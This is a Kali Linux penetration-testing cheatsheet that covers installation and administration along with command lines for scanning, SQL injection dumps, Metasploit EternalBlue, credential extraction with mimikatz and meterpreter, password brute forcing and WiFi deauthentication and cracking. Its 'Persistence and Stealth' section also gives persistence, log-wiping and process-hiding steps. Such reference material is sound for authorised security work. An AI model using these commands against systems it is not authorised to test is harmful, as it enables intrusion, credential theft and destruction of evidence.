Kali Linux Cheatsheet
Kali Linux is a Debian-based Linux distribution designed specifically for digital forensics and penetration testing. It is developed and maintained by Offensive Security and ships with over 600 penetration testing tools preinstalled, making it the platform of choice for cybersecurity professionals, ethical hackers and security researchers worldwide.
Installation and Setup
Download and Installation
# Download Kali Linux ISO
wget https://cdimage.kali.org/kali-2024.1/kali-linux-2024.1-installer-amd64.iso
# Verify checksum
sha256sum kali-linux-2024.1-installer-amd64.iso
# Create bootable USB (Linux)
sudo dd if=kali-linux-2024.1-installer-amd64.iso of=/dev/sdX bs=4M status=progress
# Create bootable USB (Windows - use Rufus or similar tool)
# Use Rufus, Etcher, or Win32DiskImager
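The checksum step above is only useful if the hash is compared against the published SHA256SUMS entry rather than eyeballed. This added example (not part of the original cheatsheet) wraps that comparison in a function; the image and sums file it exercises are constructed locally, and for a real download the SHA256SUMS.gpg signature should additionally be verified with the Kali archive key before the sums file is trusted.

```shell
#!/bin/bash
# Added example: verify an image against a SHA256SUMS-style file
# (one "<sha256>  <filename>" line per image, as Kali publishes them).

# verify_image <image> <sums-file>
# Returns 0 when the image's SHA-256 matches its entry in the sums file,
# 1 when the hash differs, 2 when the image has no entry at all.
verify_image() {
    local image="$1" sums="$2" expected actual
    # Sums files list bare file names, so compare on the basename only.
    expected=$(awk -v f="$(basename "$image")" '$2 == f {print $1}' "$sums")
    if [ -z "$expected" ]; then
        return 2
    fi
    actual=$(sha256sum "$image" | awk '{print $1}')
    if [ "$actual" = "$expected" ]; then
        return 0
    fi
    return 1
}

# Constructed demo files so the check can be exercised offline;
# a real run would point at the downloaded ISO and the downloaded SHA256SUMS.
demo_dir=$(mktemp -d)
trap 'rm -rf "$demo_dir"' EXIT
printf 'not really an iso\n' > "$demo_dir/kali-demo.iso"
sha256sum "$demo_dir/kali-demo.iso" | sed "s|$demo_dir/||" > "$demo_dir/SHA256SUMS"

if verify_image "$demo_dir/kali-demo.iso" "$demo_dir/SHA256SUMS"; then
    echo "checksum OK"
else
    echo "checksum MISMATCH or missing entry (rc=$?)"
fi
```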
Virtual Machine Setup
# VMware recommended settings
# RAM: 4GB minimum, 8GB recommended
# Storage: 80GB minimum
# Network: NAT or Bridged
# VirtualBox recommended settings
# RAM: 4GB minimum, 8GB recommended
# Storage: 80GB minimum, VDI format
# Network: NAT or Bridged
# Enable VT-x/AMD-V virtualization
Initial Configuration
# Update system
sudo apt update && sudo apt upgrade -y
# Install additional tools
sudo apt install -y kali-linux-large
# Configure non-root user (recommended)
sudo useradd -m -s /bin/bash username
sudo usermod -aG sudo username
sudo passwd username
# Enable SSH (if needed)
sudo systemctl enable ssh
sudo systemctl start ssh
# Configure firewall
sudo ufw enable
sudo ufw default deny incoming
sudo ufw default allow outgoing
Essential Tools and Commands
Information Gathering
# Nmap - Network scanning
nmap -sS -sV -O target_ip
nmap -sC -sV -oA scan_results target_ip
nmap --script vuln target_ip
# Masscan - Fast port scanner
masscan -p1-65535 target_ip --rate=1000
# Dmitry - Information gathering
dmitry -winsepo output.txt target.com
# theHarvester - Email and subdomain gathering
theHarvester -d target.com -l 500 -b google
# Recon-ng - Web reconnaissance framework
recon-ng
[recon-ng][default] > workspaces create target_workspace
[recon-ng][target_workspace] > modules load recon/domains-hosts/google_site_web
Vulnerability Assessment
# OpenVAS - Vulnerability scanner
sudo gvm-setup
sudo gvm-start
sudo gvm-feed-update
# Nikto - Web vulnerability scanner
nikto -h http://target.com
nikto -h http://target.com -o nikto_results.txt
# Dirb - Directory brute forcer
dirb http://target.com
dirb http://target.com /usr/share/dirb/wordlists/big.txt
# Gobuster - Directory/file brute forcer
gobuster dir -u http://target.com -w /usr/share/wordlists/dirbuster/directory-list-2.3-medium.txt
gobuster dns -d target.com -w /usr/share/wordlists/dnsmap.txt
# WPScan - WordPress vulnerability scanner
wpscan --url http://target.com --enumerate u,p,t
wpscan --url http://target.com --passwords /usr/share/wordlists/rockyou.txt
Web Application Testing
# Burp Suite - Web application security testing
burpsuite &
# OWASP ZAP - Web application scanner
zaproxy &
# SQLmap - SQL injection testing
sqlmap -u "http://target.com/page.php?id=1" --dbs
sqlmap -u "http://target.com/page.php?id=1" -D database_name --tables
sqlmap -u "http://target.com/page.php?id=1" -D database_name -T table_name --dump
# Commix - Command injection testing
commix --url="http://target.com/page.php?id=1"
# XSSer - Cross-site scripting testing
xsser --url "http://target.com/search.php?q=XSS" --auto
Exploitation
# Metasploit Framework
msfconsole
msf6 > search type:exploit platform:windows
msf6 > use exploit/windows/smb/ms17_010_eternalblue
msf6 exploit(windows/smb/ms17_010_eternalblue) > set RHOSTS target_ip
msf6 exploit(windows/smb/ms17_010_eternalblue) > exploit
# Searchsploit - Exploit database search
searchsploit apache 2.4
searchsploit -m 12345.py
# Social Engineering Toolkit
setoolkit
# Select from menu options for phishing, credential harvesting, etc.
# BeEF - Browser exploitation framework
beef-xss
# Access web interface at http://127.0.0.1:3000/ui/panel
Post-Exploitation
# Meterpreter commands (within Metasploit session)
meterpreter > sysinfo
meterpreter > getuid
meterpreter > ps
meterpreter > migrate PID
meterpreter > hashdump
meterpreter > screenshot
meterpreter > download C:\\file.txt /tmp/
meterpreter > upload /tmp/file.txt C:\\
# Empire - PowerShell post-exploitation
powershell-empire server
powershell-empire client
# Mimikatz - Credential extraction
mimikatz
mimikatz # privilege::debug
mimikatz # sekurlsa::logonpasswords
mimikatz # lsadump::sam
Password Attacks
# John the Ripper - Password cracking
john --wordlist=/usr/share/wordlists/rockyou.txt hashes.txt
john --show hashes.txt
# Hashcat - Advanced password recovery
hashcat -m 1000 -a 0 hashes.txt /usr/share/wordlists/rockyou.txt
hashcat -m 1000 -a 3 hashes.txt ?a?a?a?a?a?a?a?a
# Hydra - Network login cracker
hydra -l admin -P /usr/share/wordlists/rockyou.txt ssh://target_ip
hydra -L users.txt -P passwords.txt ftp://target_ip
hydra -l admin -P /usr/share/wordlists/rockyou.txt target_ip http-post-form "/login.php:username=^USER^&password=^PASS^:Invalid"
# Medusa - Parallel login brute forcer
medusa -h target_ip -u admin -P /usr/share/wordlists/rockyou.txt -M ssh
medusa -H hosts.txt -U users.txt -P passwords.txt -M ftp
# Crunch - Wordlist generator
crunch 8 8 -t ,@@@@@@@ -o wordlist.txt
crunch 6 10 abcdefghijklmnopqrstuvwxyz0123456789 -o custom_wordlist.txt
Wireless Security
# Aircrack-ng suite - WiFi security testing
# Monitor mode
airmon-ng start wlan0
# Capture packets
airodump-ng wlan0mon
# Capture specific network
airodump-ng -c 6 --bssid AA:BB:CC:DD:EE:FF -w capture wlan0mon
# Deauth attack
aireplay-ng -0 10 -a AA:BB:CC:DD:EE:FF wlan0mon
# Crack WPA/WPA2
aircrack-ng -w /usr/share/wordlists/rockyou.txt capture-01.cap
# Reaver - WPS attack
reaver -i wlan0mon -b AA:BB:CC:DD:EE:FF -vv
# Wifite - Automated wireless attack
wifite --wpa --dict /usr/share/wordlists/rockyou.txt
Digital Forensics
# Autopsy - Digital forensics platform
autopsy &
# Volatility - Memory analysis
volatility -f memory.dump imageinfo
volatility -f memory.dump --profile=Win7SP1x64 pslist
volatility -f memory.dump --profile=Win7SP1x64 netscan
volatility -f memory.dump --profile=Win7SP1x64 malfind
# Binwalk - Firmware analysis
binwalk firmware.bin
binwalk -e firmware.bin
# Foremost - File carving
foremost -i disk_image.dd -o recovered_files/
# Sleuth Kit - File system analysis
fls -r disk_image.dd
icat disk_image.dd inode_number > recovered_file
Reverse Engineering
# Ghidra - NSA reverse engineering tool
ghidra &
# Radare2 - Reverse engineering framework
r2 binary_file
[0x00000000]> aaa
[0x00000000]> pdf @main
# GDB - GNU Debugger
gdb binary_file
(gdb) run
(gdb) break main
(gdb) continue
(gdb) info registers
# Strings - Extract strings from binaries
strings binary_file
strings -n 10 binary_file | grep -i password
# Hexdump - Hex viewer
hexdump -C binary_file | head -20
xxd binary_file | head -20
System Administration
Package Management
# Update package lists
sudo apt update
# Upgrade all packages
sudo apt upgrade -y
# Install specific tools
sudo apt install -y tool_name
# Install Kali metapackages
sudo apt install -y kali-linux-large
sudo apt install -y kali-linux-everything
sudo apt install -y kali-tools-top10
# Search for packages
apt search keyword
apt show package_name
# Remove packages
sudo apt remove package_name
sudo apt purge package_name
sudo apt autoremove
Service Management
# Systemctl commands
sudo systemctl start service_name
sudo systemctl stop service_name
sudo systemctl restart service_name
sudo systemctl enable service_name
sudo systemctl disable service_name
sudo systemctl status service_name
# Common services
sudo systemctl start ssh
sudo systemctl start apache2
sudo systemctl start postgresql
sudo systemctl start mysql
# Check listening ports
netstat -tlnp
ss -tlnp
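Listing listening sockets is most useful when the output is reduced to what is actually reachable from the network. This added example (not part of the original cheatsheet) parses `ss -tlnp`-style output and reports only the listeners bound to a wildcard address; the sample output it runs over is constructed, not captured from a real host.

```shell
#!/bin/bash
# Added example: flag services listening on all interfaces (0.0.0.0, [::], *),
# i.e. the ones exposed beyond localhost. Sample ss -tlnp output is constructed.

SAMPLE_SS_OUTPUT='State  Recv-Q Send-Q Local Address:Port  Peer Address:Port Process
LISTEN 0      128    0.0.0.0:22          0.0.0.0:*         users:(("sshd",pid=812,fd=3))
LISTEN 0      511    127.0.0.1:5432      0.0.0.0:*         users:(("postgres",pid=1204,fd=6))
LISTEN 0      511    *:80                *:*               users:(("apache2",pid=1330,fd=4))
LISTEN 0      128    [::]:22             [::]:*            users:(("sshd",pid=812,fd=4))
LISTEN 0      4096   127.0.0.1:3000      0.0.0.0:*         users:(("ruby",pid=1499,fd=9))'

# exposed_listeners <ss-output>
# Prints one "port process" line per socket bound to a wildcard address,
# de-duplicated so the IPv4 and IPv6 sockets of one daemon collapse into one line.
exposed_listeners() {
    printf '%s\n' "$1" | awk '
        NR > 1 && $1 == "LISTEN" {
            addr = $4
            n = split(addr, parts, ":")
            port = parts[n]
            # Everything before the last ":" is the bind address ([::] included).
            host = substr(addr, 1, length(addr) - length(port) - 1)
            if (host == "0.0.0.0" || host == "[::]" || host == "*") {
                proc = "unknown"
                # Pull the process name out of users:(("name",pid=...,fd=...))
                if (match($6, /\("[^"]+"/)) proc = substr($6, RSTART + 2, RLENGTH - 3)
                key = port " " proc
                if (!(key in seen)) { seen[key] = 1; print key }
            }
        }'
}

# count_exposed <ss-output>: number of distinct exposed port/process pairs.
count_exposed() {
    exposed_listeners "$1" | wc -l | tr -d ' '
}

# On a live host replace the sample with: exposed_listeners "$(ss -tlnp)"
exposed_listeners "$SAMPLE_SS_OUTPUT"
```

The sample yields `22 sshd` and `80 apache2`; the PostgreSQL and Ruby listeners on 127.0.0.1 are not reported.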
Network Configuration
# Interface configuration
ip addr show
ip link set eth0 up
ip link set eth0 down
# Static IP configuration
sudo nano /etc/network/interfaces
# Add:
# auto eth0
# iface eth0 inet static
# address 192.168.1.100
# netmask 255.255.255.0
# gateway 192.168.1.1
# DNS configuration
sudo nano /etc/resolv.conf
# Add:
# nameserver 8.8.8.8
# nameserver 8.8.4.4
# Restart networking
sudo systemctl restart networking
User Management
# Add user
sudo useradd -m -s /bin/bash username
sudo passwd username
# Add user to groups
sudo usermod -aG sudo username
sudo usermod -aG adm username
# Switch user
su - username
sudo -u username command
# View user information
id username
groups username
finger username
# Lock/unlock user
sudo usermod -L username
sudo usermod -U username
Advanced Techniques
Custom Tool Installation
# Install from source
git clone https://github.com/tool/repository.git
cd repository
make && sudo make install
# Python tools
pip3 install tool_name
pip3 install -r requirements.txt
# Go tools
go install github.com/tool/repository@latest
# Ruby gems
gem install tool_name
# Manual installation
wget https://example.com/tool.tar.gz
tar -xzf tool.tar.gz
cd tool
./configure && make && sudo make install
Environment Customization
# Bash aliases
nano ~/.bashrc
# Add useful aliases:
alias ll='ls -la'
alias la='ls -A'
alias l='ls -CF'
alias ..='cd ..'
alias ...='cd ../..'
alias grep='grep --color=auto'
alias nmap='nmap --reason --open --stats-every 3m --max-retries 1 --max-scan-delay 20 --defeat-rst-ratelimit'
# Custom functions
# Extract an archive based on its extension (quoting "$1" keeps paths with spaces intact)
function extract() {
    if [ -f "$1" ] ; then
        case "$1" in
            *.tar.bz2) tar xjf "$1" ;;
            *.tar.gz)  tar xzf "$1" ;;
            *.bz2)     bunzip2 "$1" ;;
            *.rar)     unrar e "$1" ;;
            *.gz)      gunzip "$1" ;;
            *.tar)     tar xf "$1" ;;
            *.tbz2)    tar xjf "$1" ;;
            *.tgz)     tar xzf "$1" ;;
            *.zip)     unzip "$1" ;;
            *.Z)       uncompress "$1" ;;
            *.7z)      7z x "$1" ;;
            *)         echo "'$1' cannot be extracted via extract()" ;;
        esac
    else
        echo "'$1' is not a valid file"
    fi
}
# Source the changes
source ~/.bashrc
Automation Scripts
#!/bin/bash
# Basic reconnaissance script (the shebang must be the first line of the file)
TARGET="$1"
if [ -z "$TARGET" ]; then
    echo "Usage: $0 <target>"
    exit 1
fi
echo "Starting reconnaissance on $TARGET"
mkdir -p "results/$TARGET"
# Nmap scan (-sS and -O require root, so run the script with sudo)
echo "Running Nmap scan..."
nmap -sS -sV -sC -O -oA "results/$TARGET/nmap_scan" "$TARGET"
# Directory enumeration
echo "Running directory enumeration..."
gobuster dir -u "http://$TARGET" -w /usr/share/wordlists/dirbuster/directory-list-2.3-medium.txt -o "results/$TARGET/gobuster.txt"
# Nikto scan
echo "Running Nikto scan..."
nikto -h "http://$TARGET" -o "results/$TARGET/nikto.txt"
echo "Reconnaissance complete. Results saved in results/$TARGET/"
Persistence and Stealth
# SSH key persistence
ssh-keygen -t rsa -b 4096
ssh-copy-id user@target_ip
# Cron job persistence
crontab -e
# Add: @reboot /path/to/script.sh
# Service persistence
sudo nano /etc/systemd/system/custom.service
# Create service file for persistence
# Log cleaning
sudo truncate -s 0 /var/log/auth.log
sudo truncate -s 0 /var/log/syslog
history -c && history -w
# Process hiding
nohup ./malicious_binary > /dev/null 2>&1 &
disown
Troubleshooting
Common Issues
# WiFi adapter not working
sudo airmon-ng check kill
sudo ifconfig wlan0 down
sudo iwconfig wlan0 mode monitor
sudo ifconfig wlan0 up
# VirtualBox guest additions
sudo apt install -y virtualbox-guest-x11
sudo VBoxClient --clipboard
sudo VBoxClient --draganddrop
# Graphics issues
sudo apt install -y kali-desktop-xfce
sudo dpkg-reconfigure lightdm
# Sound issues
sudo apt install -y pulseaudio
pulseaudio --start
# Network issues
sudo dhclient eth0
sudo systemctl restart networking
sudo systemctl restart NetworkManager
Performance Optimization
# Disable unnecessary services
sudo systemctl disable bluetooth
sudo systemctl disable cups
sudo systemctl disable avahi-daemon
# Clean system
sudo apt autoremove
sudo apt autoclean
sudo apt clean
# Monitor resources
htop
iotop
nethogs
iftop
# Optimize for VMs
sudo apt install -y open-vm-tools
sudo apt install -y virtualbox-guest-utils
Security Best Practices
Operational Security
# Use VPN for testing
sudo openvpn config.ovpn
# Proxy chains configuration
sudo nano /etc/proxychains.conf
proxychains nmap target_ip
# Tor usage
sudo systemctl start tor
proxychains firefox
# MAC address randomization
sudo macchanger -r wlan0
sudo macchanger -m 00:11:22:33:44:55 wlan0
# Secure deletion
shred -vfz -n 3 sensitive_file
wipe -rf directory/
Legal and Ethical Considerations
# Always obtain proper authorization
# Document scope and limitations
# Follow responsible disclosure
# Maintain confidentiality
# Respect privacy and data protection laws
# Create engagement documentation
echo "Penetration Test Authorization" > authorization.txt
echo "Client: Company Name" >> authorization.txt
echo "Scope: IP ranges, domains" >> authorization.txt
echo "Date: $(date)" >> authorization.txt
echo "Tester: Your Name" >> authorization.txt
Resources
- Kali Linux Official Documentation
- [Offensive Security Training](https://www.offensive-security.com/)
- [Kali Linux Tools](URL_32_
- [Penetration Testing Execution Standard](http://www.pentest-standard.org/)
- OWASP Testing Guide